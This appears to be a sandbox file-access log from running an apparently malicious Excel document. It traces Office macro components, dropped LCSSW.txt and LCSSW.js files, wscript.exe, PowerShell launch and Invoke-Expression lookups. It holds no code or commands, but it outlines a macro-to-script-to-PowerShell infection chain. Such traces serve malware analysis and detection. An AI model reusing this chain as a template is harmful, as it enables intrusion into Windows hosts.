C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\VBE7.DLL
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\VBE7.DLL
C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
C:\Users\user\AppData\Local\Temp\Excel8.0\MSComctlLib.exd
C:\Program Files\Microsoft Office\root\Office16\VBEUI.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\VBEUI.DLL
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\VBEUI.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL
C:\Program Files\Microsoft Office\root\vfs\SystemX86\C_932.NLS
C:\Windows\System32\C_932.NLS
C:\Program Files\Microsoft Office\root\vfs\SystemX86\C_949.NLS
C:\Windows\System32\C_949.NLS
C:\Program Files\Microsoft Office\root\vfs\SystemX86\C_950.NLS
C:\Windows\System32\C_950.NLS
C:\Program Files\Microsoft Office\root\vfs\SystemX86\C_936.NLS
C:\Windows\System32\C_936.NLS
C:\Users\user\AppData\Local\Temp\~DF0D16C1186A1654C4.TMP
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\root\vfs\SystemX86\stdole2.tlb
C:\Windows\System32\stdole2.tlb
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO.DLL
C:\Users\user\AppData\Roaming\Microsoft\Office\
C:\Users\user\AppData\Roaming\Microsoft\Office\review.rcd
C:\Users\user\AppData\Roaming\Microsoft\Office\adhoc.rcd
C:\Program Files\Microsoft Office\root\vfs\Fonts\staticcache.dat
C:\Windows\Fonts\staticcache.dat
C:\Program Files\Microsoft Office\root\Office16\MSPTLS.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSPTLS.DLL
C:\Users\user\Searches\desktop.ini
C:\Users\user\Videos\desktop.ini
C:\Program Files\Microsoft Office\root\vfs\SystemX86\en-US\SHELL32.dll.mui
C:\Windows\System32\en-US\SHELL32.dll.mui
C:\Users\user\Pictures\desktop.ini
C:\Users\user\Contacts\desktop.ini
C:\Users\Public\desktop.ini
C:\Users\user\Favorites\desktop.ini
C:\Users\Public
C:\Users\Public\Desktop
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\Documents
C:\Users\user\Documents\desktop.ini
C:\Users\Public\Documents
C:\Users\Public\Documents\desktop.ini
C:\Users\user\Downloads
C:\Program Files\Microsoft Office\root\vfs\SystemX86\shdocvw.dll
C:\Windows\System32\shdocvw.dll
C:\Users\user\AppData\Local\Temp\~DFD8375274759C4F6D.TMP
C:\Users\user\AppData\Local\Temp\LCSSW.txt
C:\Program Files\Microsoft Office\root\vfs\SystemX86\packager.dll
C:\Windows\System32\packager.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\en-US\packager.dll.mui
C:\Windows\System32\en-US\packager.dll.mui
C:\Users\user\AppData\Roaming
C:\Program Files\Microsoft Office\root\vfs\SystemX86\shlwapi.dll
C:\Windows\System32\shlwapi.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\propsys.dll
C:\Windows\System32\propsys.dll
C:\Users\user\AppData\Roaming\desktop.ini
C:\Users\user\AppData\
C:\Users\user\
C:\Users\
C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE
C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
C:\Program Files\Microsoft Office\root\Office16\MSPUB.EXE
C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
C:\Program Files\Microsoft Office\root\Office16\lync.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\WinRAR\RarExt.dll
C:\Program Files\WinRAR\RarExt.dll
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\WinRAR\WinRAR.ini
C:\Program Files\WinRAR\WinRAR.ini
C:\Users\user\AppData\Roaming\WinRAR
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms
C:\Program Files\Microsoft Office\root\vfs\SystemX86\syncui.dll
C:\Windows\System32\syncui.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\twext.dll
C:\Windows\System32\twext.dll
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries
C:\Windows\System32\en-US\twext.dll.mui
C:\Program Files\7-Zip\7-zip.dll
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\7-Zip\Lang\en.txt
C:\Program Files\7-Zip\Lang\en.txt
\??\Volume{5571c645-6060-11ed-bf52-806e6f6e6963}\
C:\Users\user\AppData\Roaming\LCSSW.txt
C:\Program Files\Microsoft Office\root\vfs\SystemX86\en-US\propsys.dll.mui
C:\Windows\System32\en-US\propsys.dll.mui
C:\Program Files\Microsoft Office\root\Office16\imageres.dll
C:\Users\user\Documents\imageres.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\imageres.dll
C:\Windows\System32\imageres.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\en-US\imageres.dll.mui
C:\Windows\System32\en-US\imageres.dll.mui
C:\Users\user\AppData\Roaming\LCSSW.js
C:\Program Files\Microsoft Office\root\vfs\SystemX86\zipfldr.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\wscript.exe
C:\Windows\System32\wscript.exe
C:\Program Files\Microsoft Office\root\vfs\SystemX86\wshext.dll
C:\Windows\System32\wshext.dll
C:\Program Files\Microsoft Office\root\vfs\SystemX86\en-US\wshext.dll.mui
C:\Windows\System32\en-US\wshext.dll.mui
C:\Users\user\AppData\Roaming\LCSSW.js:Zone.Identifier
C:\Program Files\Microsoft Office\root\Office16\sfc_os.DLL
C:\Program Files\Microsoft Office\root\vfs\SystemX86\sfc_os.dll
C:\Windows\System32\sfc_os.dll
C:\Program Files\Microsoft Office\root\vfs\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
C:\Program Files\Microsoft Office\root\Office16\OSFSHARED.DLL
C:\Users\user\AppData\Local\Microsoft\Office
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands\Excel.*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate
C:\Program Files\Microsoft Office\root\Office16\MSOHEV.DLL
C:\Program Files\Microsoft Office\root\Office16\Microsoft.Office.PolicyTips.dll
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\IACOM2.DLL
C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat
C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\
C:\Program Files\Microsoft Office\root\Office16\EXP_PDF.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\EXP_PDF.DLL
C:\Program Files\Microsoft Office\root\Office16\EXP_XPS.DLL
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\EXP_XPS.DLL
C:\Users\user\AppData\Roaming\Microsoft\Excel\
C:\Users\user\AppData\Roaming\Microsoft\Excel\72a01610de72cacddef9297c415389d17ae9069d74ce742171*
C:\Users\user\AppData\Roaming\Microsoft\Excel\72a01610de72cacddef9297c415389d17ae9069d74ce742171312217221438028319\*((*
C:\Program Files\Microsoft Office\root\vfs\Fonts\segoeuil.ttf
C:\Windows\Fonts\segoeuil.ttf
C:\Program Files\Microsoft Office\root\vfs\Fonts\SEGOEUISL.TTF
C:\Windows\Fonts\SEGOEUISL.TTF
C:\Program Files\Microsoft Office\root\vfs\Fonts\seguisb.ttf
C:\Windows\Fonts\seguisb.ttf
C:\Program Files\Microsoft Office\root\vfs\Fonts\tahomabd.ttf
C:\Windows\Fonts\tahomabd.ttf
C:\Program Files\Microsoft Office\root\vfs\SystemX86\en-US\msxml6r.dll.mui
C:\Windows\System32\en-US\msxml6r.dll.mui
C:\Users\user\AppData\Local\Temp\
C:\Windows\inf\hdaudio.inf
C:\Windows\System32\DriverStore\en-US\hdaudio.inf_loc
C:\Windows\inf\hdaudio.PNF
C:\Windows\Temp
C:\Windows\win.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Program Files\Microsoft Office\root
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
C:\Program Files
C:\Program Files\desktop.ini
C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
C:\Windows\AppPatch\sysmain.sdb
C:\Program Files\Microsoft Office\root\Office16\
C:\Program Files\Microsoft Office\root\Office16\*.*
C:\Program Files\Microsoft Office\root\Office16\ui\SwDRM.dll
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL
C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE.Manifest
C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE.Config
C:\program files\microsoft office\root\vfs\Windows\installer\{90160000-000f-0000-0000-0000000ff1ce}\xlicons.exe
C:\Windows\System32\ieframe.dll
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe:Zone.Identifier
C:\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_clicktorun_db4f72d876da6c52.cdf-ms
C:\Windows\AppPatch\pcamain.sdb
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\
C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\*.*
C:\Program Files\Common Files\microsoft shared\ClickToRun
C:\%SystemRoot%\system32\WindowsPowerShell\v1.0\PowerShell.exe
C:\Users\user\Documents\powershell.exe
C:\Windows\System32\powershell.exe
C:\Windows\system\powershell.exe
C:\Windows\powershell.exe
C:\Python38\Scripts\powershell.exe
C:\Python38\powershell.exe
C:\Program Files\Common Files\Oracle\Java\javapath\powershell.exe
C:\ProgramData\Boxstarter\powershell.exe
C:\Windows\System32\wbem\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows
C:\Windows\System32
C:\Windows\System32\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell\v1.0
C:\Windows\System32\en-US\PROPSYS.dll.mui
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier
C:\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_3f102d555ee05d33.cdf-ms
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll.aux
C:\Windows\assembly\pubpol165.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\e94ba0e5a14690d49a13eeb2b37f10e5\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\e94ba0e5a14690d49a13eeb2b37f10e5\Microsoft.PowerShell.ConsoleHost.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\c37b79c19b7ae5c8d3b8c4f23fbff3dc\System.Management.Automation.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\c37b79c19b7ae5c8d3b8c4f23fbff3dc\System.Management.Automation.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Serialization.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Management.Automation.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll
C:\Windows\Microsoft.Net\assembly\GAC\System.Management.Automation.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1
C:\Windows\assembly\GAC_32\System.Management.Automation.resources\3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll
C:\Windows\assembly\GAC\System.Management.Automation.resources\3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.exe
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.exe
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\Microsoft.Net\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\assembly\GAC_32\Microsoft.PowerShell.ConsoleHost.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell
C:\PSTranscripts\20251208\PowerShell_transcript.USERDUM-NNN0BL9.awDK_ja3.20251208163520.txt
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\dd80b6bd88741a27f7bb74ab0c89a3ba\System.Data.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\dd80b6bd88741a27f7bb74ab0c89a3ba\System.Data.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Caching\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Caching.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\fea996c385fbc624826f8e043f6d5329\System.Management.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\fea996c385fbc624826f8e043f6d5329\System.Management.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\22226fd213cda8b0409db35f1a6000f7\System.DirectoryServices.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\22226fd213cda8b0409db35f1a6000f7\System.DirectoryServices.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\0d866ff1d48a2b0077be47701476978d\Microsoft.PowerShell.Security.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\0d866ff1d48a2b0077be47701476978d\Microsoft.PowerShell.Security.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8c730c7fbe608461407cf3be279cdeab\System.Configuration.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8c730c7fbe608461407cf3be279cdeab\System.Configuration.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\d888c64a78e1d160344eadccac1e18e2\Microsoft.Management.Infrastructure.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\ce1b28106ce7b869fa471d6407556191\System.Transactions.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\ce1b28106ce7b869fa471d6407556191\System.Transactions.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\39bc6b2550e216781f343bac4cc024af\System.Numerics.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\39bc6b2550e216781f343bac4cc024af\System.Numerics.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\dcb96320d4312deea3218436f1f8b65c\Microsoft.CSharp.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\dcb96320d4312deea3218436f1f8b65c\Microsoft.CSharp.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll
C:\Windows\System32\wldp.dll
C:\Users\user\AppData\Local\Temp\2k4ha12y.rev.ps1
C:\Users\user\AppData\Local\Temp\0ro50elk.i5p.psm1
C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
C:\Users\user\Documents\WindowsPowerShell\profile.ps1
C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
C:\PSTranscripts\20251208
C:\PSTranscripts
C:\Users\user\Documents\%SystemRoot%\system32\WindowsPowerShell\v1.0\
C:\Python38\Scripts\
C:\Python38\Scripts\Invoke-Expression.*
C:\Python38\
C:\Python38\Invoke-Expression.*
C:\Program Files\Common Files\Oracle\Java\javapath
C:\Program Files\Common Files\Oracle\Java\javapath\Invoke-Expression.*
C:\ProgramData\Boxstarter
C:\ProgramData\Boxstarter\Invoke-Expression.*
C:\Windows\System32\Invoke-Expression.*
C:\Windows\Invoke-Expression.*
C:\Windows\System32\wbem
C:\Windows\System32\wbem\Invoke-Expression.*
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\WindowsPowerShell\v1.0\Invoke-Expression.*
C:\ProgramData\chocolatey\bin
C:\ProgramData\chocolatey\bin\Invoke-Expression.*
C:\Program Files\dotnet\
C:\Program Files\dotnet\Invoke-Expression.*
C:\Program Files\Microsoft Office\root\Client
C:\Program Files\Microsoft Office\root\Client\Invoke-Expression.*
C:\Users\user\Documents\WindowsPowerShell\Modules
C:\ProgramData\Boxstarter\*
C:\ProgramData\Boxstarter\Boxstarter.psd1
C:\ProgramData\Boxstarter\Boxstarter.psm1
C:\ProgramData\Boxstarter\Boxstarter.cdxml
C:\ProgramData\Boxstarter\Boxstarter.xaml
C:\ProgramData\Boxstarter\Boxstarter.ni.dll
C:\ProgramData\Boxstarter\Boxstarter.dll
C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper
C:\ProgramData\Boxstarter\Boxstarter.Chocolatey
C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\*
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\*
C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Boxstarter.Chocolatey.psd1
C:\ProgramData\Boxstarter\Boxstarter.Common\*
C:\ProgramData\Boxstarter\Boxstarter.Common\Boxstarter.Common.psd1
C:\ProgramData\Boxstarter\Boxstarter.HyperV\*
C:\ProgramData\Boxstarter\Boxstarter.HyperV\Boxstarter.HyperV.psd1
C:\ProgramData\Boxstarter\Boxstarter.WinConfig\*
C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Boxstarter.WinConfig.psd1
C:\ProgramData\Boxstarter\BuildPackages\*
C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.psd1
C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.psm1
C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.cdxml
C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.xaml
C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.ni.dll
C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.dll
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\*
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tmp6344.tmp.psd1
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tmp6344.tmp.psm1
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tmp6344.tmp.cdxml
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tmp6344.tmp.xaml
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tmp6344.tmp.ni.dll
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tmp6344.tmp.dll
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tools
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tools\*
C:\ProgramData\Boxstarter\BuildPackages\tmp6344.tmp\tools\tools.psd1
